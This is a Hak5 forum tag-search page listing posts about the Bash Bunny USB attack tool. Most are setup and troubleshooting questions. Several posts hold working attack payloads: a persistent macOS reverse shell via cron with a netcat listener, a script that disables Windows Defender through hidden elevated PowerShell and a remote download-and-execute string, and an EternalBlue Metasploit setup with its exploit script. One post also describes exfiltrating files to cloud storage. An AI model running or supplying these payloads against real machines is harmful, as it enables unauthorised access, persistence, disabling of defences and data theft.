Jump to content

Search the Community

Showing results for tags 'bashbunny'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Just got my Bash Bunny and wanted to use the Wallpaper Changer of Doom, but did not want to be relying on an internet connection. So I rewrote the script so it now copies an image from "root\W" (you'll have to add that folder yourself and add an image) to a super hidden folder "C:\users\<userprofile>\Temp". New to the coding scene. So if you guys have any tips, tricks or improvements on my little code. Please let me know! Link: https://github.com/Jay-Delic/BashBunny_Local-Wallpaper-Changer-of-Doom
  2. Can everyone Tell me how i get the factory reset? The introduction from bash Bunny does not Work for the bash Bunny Mark 2.
  3. Hi there! I'm trying to make a new hu layout for the usb rubber ducky and for the bash bunny. I'm having a bit of trouble to find the scan codes needed for the "translate". I've used the different languages as an example for the codes, but I can not find the needed code for my Alt Gr key. Now I'm using the Ctrl+Alt as the AltGr key, but I've read on this forum that the Ctrl+Alt combo can lead to extra functions in some applications. Can someone help me to figure out a guide to map the keys? Examples: "__comment":"Experiment with the CTRL-ALT btn as ALTGR", "CTRL-ALT":"05,00,00", ";":"05,00,36", --> need: AltGr+key36 "*":"05,00,38", --> need: AltGr+key38 "#":"05,00,1b", --> need: AltGr+key1b Thanks in advance!
  4. Hi Let's start with the scenario. Say you'd like to connect the Bash Bunny to another device that doesn't accept ACM. One such scenario is when connecting to mobile device like Android. These devices communicate through a protocol but only over a USB data connection. (Unless I'm misstaken) So none of the currently available attack modes support this. I'm sure there are more scenarios where this is applicable. And forcing other drivers to be loaded by the target would enlarge the possible attack surface. My questions are therefor if it is possible to add new attack modes? And if so, what steps are required to make this possible. Or if anyone have been able to connect to an Android device through USB. (Not by enabling ADB over ethernet/Wi-Fi, opening a port and issuing the command "adb connect". When connected correctly over USB issuing "adb devices" should list the target)
  5. so I updated my bunny and it runs perfectly fine it runs payloads creates the folders for the loot of the payload I ran but there is never any loot there im using the library feature when you update the bunny which just gives you the scripts on the git for the bunny and I downloaded impacket, metasploit, responder, and gohttp and installed and made sure that wasn't the issue I even uninstalled and reinstalled them but that has not worked the problem im thinking is there is a typo in these scripts or there is a missing string that puts the loot into the folder does anyone have or know of any scripts that are 100% working with US keyboard or how do I fix these scripts to drop loot into there folder im completely new to bash bunny and have no idea how to write a script yet so all help would be very much appreciated youtube wasnt that great cause there is little to no tutorials on the bash bunny for setting up payload scripts correctly
  6. Hi everyone, im a totally new on this. but i recently got my Bash Bunny and got the payloads from github. when i copy paste the payloads to switch 1 and plug it in to my laptop, but then it creates a file on loot "PasswordGrabber" but there isnt anything on the folder.
  7. Hello, Just asking you guys, is BB worth it in 2020? I mean is all of it detected by AV and does it run? Also how long the Bunny works, does it turn into DedBunny easily? Or does it have long life?
  8. Hi all, I need some help because I do not get quickcreds on my bashbunny to run. I'm am using Windows 10 for the bashbunny setup. ###Bashbunny in arm mode I copied the 1.6 firmware from https://downloads.hak5.org/bunny to the root of my bash bunny. Replugged the bashbunny and waited for the red blinking light to stop I checked the version.txt in root which confirmed 1.6_305 I downloaded the responder and the imppacket from here https://forums.hak5.org/topic/40971-info-tools/ and placed the two files in the tools directory responder-bunny.deb & impacket-bunny.deb Then I unplugged and plugged the bashbunny back in an checked that the tools folder was empty. Then I connected to the bashbunny and checked that the folder responder and impacket where copied to the device. Then I ran root@bunny:/tools/impacket# python setup.py install I then copied the quick creds payload to "D:\payloads\switch1\payload.txt" and safely ejected the bashbunny. ###Bashbunny in switch position 1 I plugged the bashbunny in my Windows 10 machine and the light is just solid red. I waited for 5 hours and the light was still unchanged. Any ideas what I am doing wrong? Is quickreds still working on firmware 1.6. Do you have any links to current tutorials or walkthroughs? Any help is much appreciated.
  9. Hi all, I need some help because I do not get quickcreds on my bashbunny to run. I'm am using Windows 10 for the bashbunny setup. ###Bashbunny in arm mode I copied the 1.6 firmware from https://downloads.hak5.org/bunny to the root of my bash bunny. Replugged the bashbunny and waited for the red blinking light to stop I checked the version.txt in root which confirmed 1.6_305 I downloaded the responder and the imppacket from here https://forums.hak5.org/topic/40971-info-tools/ and placed the two files in the tools directory responder-bunny.deb & impacket-bunny.deb Then I unplugged and plugged the bashbunny back in an checked that the tools folder was empty. Then I connected to the bashbunny and checked that the folder responder and impacket where copied to the device. Then I ran root@bunny:/tools/impacket# python setup.py install I then copied the quick creds payload to "D:\payloads\switch1\payload.txt" and safely ejected the bashbunny. ###Bashbunny in switch position 1 I plugged the bashbunny in my Windows 10 machine and the light is just solid red. I waited for 5 hours and the light was still unchanged. Any ideas what I am doing wrong? Is quickreds still working on firmware 1.6. Do you have any links to current tutorials or walkthroughs? Any help is much appreciated.
  10. Reverse Shell Mac for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. Targets MacOS (OSX may work but has not been tested) Connection can be closed and reconnected at any time Deploys in roughly 30 sec (working on making it faster) Works well with NetCat as the listener Requirements Have a working Bash Bunny :) and a victim with MacOS STATUS LED STATUS Purple Setup Amber (Single Blink) Installing connect.sh script Amber (Double Blink) Creating cron job White (Fast Blink) Cleaning up Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from MacPersistentReverseShell to either switch folder Edit the connect.sh file and replace the placeholder IP with attacker's IP and the port with whichever port you like to use (I use 1337 ?) Save the connect.sh file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the connect.sh file on whichever program you'd like (I use NetCat) If using NetCat, run the command nc -nlvp 1337 (replace the port with the port in connect.sh) Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) Once a bash shell prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download.
  11. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (BashBunny) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # LED SETUP ATTACKMODE HID LED ATTACK RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; LED FINISH
  12. My latest BashBunny-Challenge.....MSF - MS17_010 - BashBunny Thanks to Astr0baby, iam just a sharer of his excellent thoughts Lets go..... Make sure to set some date for TLS/SSL to work ;) # date -s "20170925" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev # curl -sSL https://get.rvm.io | bash -s stable # source /etc/profile.d/rvm.sh # rvm requirements # rvm list known # rvm install 2.4.1 # vi /root/.bashrc Add at the end source /etc/profile/rvm.sh rvm use 2.4.1 --default # mkdir /root/METASPLOIT # cd /root/METASPLOIT/ # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh # chmod +x msf_vps_installer.sh # ./msf_vps_installer.sh # git config --global user.name "USER" # git config --global user.email "user@example.com" # ./msfupdate Check the /etc/dhcp/dhcpd.conf range 172.16.64.10 - 172.16.64.12 and set to only one value range 172.16.64.64 - 172.16.64.64 Save this to ~/metasploit-framework as cmd.rc ----- use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/exec set RHOST 172.16.64.64 set CMD cmd.exe exploit ----- The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked) If the target is locked we can use another payload such this one So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via Metasploit RC script so ;) The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position . So ideally this would look like this (switch1 or switch 2) payload.txt #!/bin/bash LED SETUP ATTACKMODE RNDIS_ETHERNET #Set some current time ..... check your watch date -s "20170523 23:23" LED ATTACK /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & LED FINISH The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on .. After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)
  13. Hey guys, I'd like to know how to emulate a mouse click in a certain position(x,y) on the screen? we must use VID/PID of a mouse I know that then how to adjust the payload to make a click ?
  14. Hi, Just wondering if anyone could give me some guidance I work in the security team at a company, I want to roll out a siem agent to developers laptops. I need to install this agent as quickly as possible to linux/mac boxes whilst they are locked or unlocked.(devs dont want to do it themselves are pretty reluctant on handing over their laptops) the agent is basically a bash script install... chmod +x & ./<filename> I think I could use my bashbunny to quickly walk over to the devs laptops, put the usb in... and job done.... So my question is if I run the install via a payload. will it install on the bashbunny OS or the laptop ive plugged it into? or will I have to copy it to the remote OS and use a series of key presses to run it. Any advice would be great. Thanks
  15. Hi, I've just received my Bash Bunny. First thing I've did is download and run bunnyupdater.exe I'm currently at version 1.6_305 with the \payloads\library full of payloads. When connecting the BB to a windows 10 machine, I can see things moving (like powershell window opening and "start > run" text) I can also see that the Payloads are creating the needed loot folders. But eventually these folders are empty. Among others I've tried using: WiPassDump, WifiPass, PasswordGrabber, Ascii-Prank and others. Nothing in the loot folder, and the "Ascii-Prank" didn't do anything. I tried it on 3 different computers (all windows 10). Any ideas on what could be the probelm? Is there are way to debug a PAYLOAD so I'd see which command fails? I'd appreciate any help.
  16. Shanegal

    shane

    hey guys, so I had some trouble with the screaming payload of doom payload so ive adapted the wallpaper changer payload to do basically the same thing but instead of transferring the wallpaper jpeg, it transfers the .wav file from the bash bunny. Everything kinda works apart from the transferred wav file keeps showing up as 0kb after the script has run? can anyone help me with this please? Here is the script ive have made and ive attached the full payload at the bottom LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET HOST_IP GET SWITCH_POSITION udisk mount cd /root/udisk/payloads/$SWITCH_POSITION python -m SimpleHTTPServer 80 & LED ATTACK Q GUI r Q DELAY 500 Q STRING "cmd /C \"start /MIN powershell iwr $HOST_IP/S.WAV > %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" Q ENTER LED G SUCCESS s.wav screamer payload.txt
  17. Just got new bash bunny, having problem with switch position 1, poisition 2 works fine. #locked LED M FAST ATTACKMODE HID QUACK GUI This script is in both folders a payload, again it runs fine in position 2. When in position 1 LED goes solid magenta then switches to flashing blue, the bunny folder then opens. Any ideas as to why switch position 1 not working?
  18. tcunha

    Updating BB

    I got my bash bunny at the 1.3 firmware version and tried to update, but after that it stop working. Now I insert the bash bunny at the computer it turns the green light on for a second and turn of the led. I tried factory reset but it doesn't work.
  19. Hello, having received my new toy recently (bashbunny) : I tried to use some scripts like "wallpaper-changer-of-doom" except it didn't work at home. Here is the script: https://github.com/jcardonne/Bashbunny-payloads/blob/master/wallpaper-prank If some of you have any suggestions, I'm interested:) Affectionately, jcardonne
  20. I have been trying to figure out a problem with this payload and for some reason I just cant get it work i have impacket in my tools file and installed when I plug my Bunny in it goes throw the colors but it gets stuck in the blue color and i cant figure out why? Do anyone have the same problem?
  21. I just got my new bash bunny! I'm so excited to start using. One thing I noticed is I am unable to get the "windows key" to work. Specifically I am trying to open a command prompt but it is not working. I noticed when I use the combination of "Q GUI R" it actually presses "ALT + R". Bashbunny is running version 1.6 My laptop is a Lenovo T480 Running Windows 10 1809 ### PAYLOAD ATTACKMODE HID Q SET_LANGUAGE US Q DELAY 5000 LED M, R B Q GUI R Q DELAY 500 Q STRING cmd Q DELAY 500 Q ENTER LED G ### config.txt #!/bin/bash #This configuration file is used to set default variables DUCKY_LANG us
  22. Is it possible to change the bashbunny device name to something of my choice? I figured it would be in the ATTACKMODE file where the serial number is under /bin. Right now the device reads: "USB Ethernet/RNDIS Gadget" or something to that affect.
  23. I'm trying to install impacket and responder to my BB using the .deb files provided on another thread however, my bunny doesn't seem to recognise the updated tools folder. When I copy the files, eject and plug back in, it just boots as normal and doesn't copy anything to its /tools on its linux partition. I found a previous thread saying to delete the everything, change the version.txt file to an earlier version and run the updater but I don't wanna mess it up any more than it already is. I've tried restoring by inducing 3 failed boots to restore to factory but that hasn't seemed to work
  24. So I wanted to know if this was safe. I made a bunny script that when plugs into a Windows PC would upload specific files to a folder in my gdrive. I made this a project for myself because i was bored. I manipulated the "SmartFileExtract_Exfiltrator" code and used a gdrive software to make it work. How bad can this be and should it even exist at all?
  25. Hallo!! This is my payload, just a python smb server thats points to the switch folder. PROBLEM: it creates the share, but i cant access the files, because the /root/udisk is not mounted. If i boot the bunny in RNDIS, goto the console and do "udisk mount" i can access the files, but I cant mount udisk from inside a payload Any ideas? Is there anything I'm missing. Thx, and keep on developing!! :) #!/bin/bash LED SETUP GET SWITCH_POSITION SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot LED STAGE1 ATTACKMODE RNDIS_ETHERNET udisk mount python /tools/impacket/examples/smbserver.py e $SWITCHDIR & LED FINISH
×
×
  • Create New...